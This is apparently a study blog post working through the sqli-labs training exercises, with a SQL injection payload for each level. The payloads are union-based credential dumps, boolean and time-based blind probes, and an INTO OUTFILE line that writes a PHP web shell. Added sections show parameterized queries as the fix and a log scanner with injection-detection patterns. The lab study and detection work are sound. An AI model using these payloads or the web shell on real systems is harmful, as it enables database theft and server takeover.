sqli lab php7, SQLi-Lab exercises

After a stretch of onboarding training at my new job, I feel my security fundamentals are still not solid enough, so I am starting again from the basics: rereading 《白帽子学Web安全》 a few more times, and setting myself a goal of studying the source of at least one vulnerability every week and writing up a report.

This week I am working through all of the sqli-labs challenges and writing out a payload for each one.

Page-1


Less-1:http://localhost/sqli-labs-php7/Less-1/?id=-1' union select 1,group_concat(id,'-',username,'-',password, '---'),3 from users -- %20

Less-2:http://localhost/sqli-labs-php7/Less-2/?id=-1 union select 1,group_concat(id,'-',username,'-',password, '---'),3 from users -- %20

Less-3:http://localhost/sqli-labs-php7/Less-3/?id=-1') union select 1,group_concat(id,"-",username,"-",password, "---"),3 from users -- %20

Less-4:http://localhost/sqli-labs-php7/Less-4/?id=-1") union select 1,group_concat(id,"-",username,"-",password, "---"),3 from users -- %20
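Why the Less-1 to Less-4 payloads work, and what closes the hole, as an added example that is not part of the original post: the lab splices `id` straight into the SQL string, so a quote-break followed by UNION is parsed as SQL rather than compared as data. The script below uses sqlite3 as a stand-in for the lab's `users` table (the rows are constructed, not the lab's seed data) and runs the same query shape twice, once with string formatting and once with a bound parameter. The payload is adapted for SQLite, whose group_concat takes at most two arguments, so the columns are joined with `||` instead.

```python
import sqlite3

# Constructed rows standing in for the lab's `users` table (not sqli-labs' real seed data).
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]

# Less-1 style payload adapted to SQLite: break out of the quote, UNION three columns to
# match the original SELECT, aggregate every row into column 2, comment out the trailing LIMIT.
PAYLOAD = "-1' UNION SELECT 1, group_concat(username || '-' || password, ','), 3 FROM users -- "


def make_db():
    """In-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Same shape as the lab's query: the parameter is spliced into the SQL text."""
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Same query with a bound parameter: the value stays data and is never parsed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchall()


def compare(user_id):
    """Run both variants on one input and return their row sets side by side."""
    conn = make_db()
    try:
        return {
            "vulnerable": lookup_vulnerable(conn, user_id),
            "safe": lookup_safe(conn, user_id),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    for value in ("1", PAYLOAD):
        print(repr(value))
        for name, rows in compare(value).items():
            print(f"  {name:>10}: {rows}")
```

With a normal `id=1` both variants return the single Dumb row. With the payload, the formatted query returns one row whose second column holds every username and password in the table, while the parameterized query returns nothing, because the whole payload is compared against the integer `id` column as one opaque string.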

Less-5: blind injection

// dump databases

?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+

// dump tables

?id=1' and left((select table_name from information_schema.tables where information_schema.tables.table_schema=database() limit 0,1),1)='e' --+

// dump columns

?id=1' and left((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 2,1),8)='password' --+

// dump data

?id=1' and left((select username from users order by id limit 0,1),4)='Dumb' --+

Less-6: blind injection

// dump databases

?id=1" and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+

// dump tables

?id=1" and left((select table_name from information_schema.tables where information_schema.tables.table_schema=database() limit 0,1),1)='e' --+

// dump columns

?id=1" and left((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 2,1),8)='password' --+

// dump data

?id=1" and left((select username from users order by id limit 0,1),4)='Dumb' --+

Less-7: injection that writes a file

?id=1')) union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "/Applications/XAMPP/xamppfiles/1.php" --+

Less-8: boolean-based blind injection

?id=1' and left((select username from users order by id limit 0,1),4)='dumb' --+

Less-9: single-quote time-based blind injection

?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1) --+

Less-10: double-quote time-based blind injection

?id=1" and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1) --+

Less-11

// dump tables

' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() --

// dump columns

' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema = database() --

// dump data

' union select 1, group_concat(username,":",password," ") from users --
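The same payloads seen from the defender's side, as an added example that is not part of the original post: a small scanner over constructed Apache access-log lines (the requests from Less-1, 5, 7 and 9 URL-encoded the way a browser sends them, plus one benign request) that decodes each request target and flags the signatures used from Less-5 through Less-11: UNION SELECT, information_schema lookups, boolean probes such as `and ascii(`, `and left(` and `and if(`, sleep()-based delays, and INTO OUTFILE. The rule names, patterns and sample lines are my own; note that unquote_plus turns the `+` in `--+` into the space MySQL requires after `--`, which is exactly why the payloads end that way.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in Apache combined format. The request targets are the lab
# payloads as a browser would encode them, plus one benign request that must not be flagged.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Jun/2020:12:00:01 +0800] "GET /sqli-labs-php7/Less-1/?id=1 HTTP/1.1" 200 712',
    '127.0.0.1 - - [10/Jun/2020:12:00:05 +0800] "GET /sqli-labs-php7/Less-1/?id=-1%27%20union%20select%201,group_concat(username),3%20from%20users%20--%20 HTTP/1.1" 200 912',
    '127.0.0.1 - - [10/Jun/2020:12:00:09 +0800] "GET /sqli-labs-php7/Less-5/?id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%201,1),1,1))%3E100--+ HTTP/1.1" 200 704',
    '127.0.0.1 - - [10/Jun/2020:12:00:20 +0800] "GET /sqli-labs-php7/Less-9/?id=1%27%20and%20if(left((select%20username%20from%20users%20limit%200,1),4)=%27dumb%27,sleep(5),1)--+ HTTP/1.1" 200 704',
    '127.0.0.1 - - [10/Jun/2020:12:00:25 +0800] "GET /sqli-labs-php7/Less-7/?id=1%27))%20union%20select%201,2,3%20into%20outfile%20%22/tmp/x.php%22%20--+ HTTP/1.1" 200 704',
]

# Each rule is named after the technique it flags; patterns run on the lower-cased, URL-decoded target.
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "boolean_probe": re.compile(r"\b(and|or)\s+(if|ascii|left|substr|mid)\s*\("),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "into_outfile": re.compile(r"\binto\s+(out|dump)file\b"),
}

# Request line inside the quotes of a combined-format entry: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_target(line):
    """Extract the request target and undo URL encoding ('+' and '%20' both become spaces)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    return unquote_plus(m.group("target")).lower()


def classify(line):
    """Return the sorted names of every rule that matches one log line."""
    target = decode_target(line)
    if target is None:
        return []
    return sorted(name for name, rx in RULES.items() if rx.search(target))


def scan(lines):
    """Map line index -> matched rule names, omitting lines with no hits."""
    hits = {}
    for i, line in enumerate(lines):
        names = classify(line)
        if names:
            hits[i] = names
    return hits


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(names)}")
```

Decoding before matching is the important step: the same `union select` arrives as `%20union%20select`, `union+select` or mixed case, and a rule that only looks at the raw line misses most of it. The boolean and time-based rules fire on the probe shape rather than on any particular table name, so they also catch the Less-8 to Less-10 variants that never mention information_schema.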

Source: https://www.cnblogs.com/kimjun/p/13185609.html
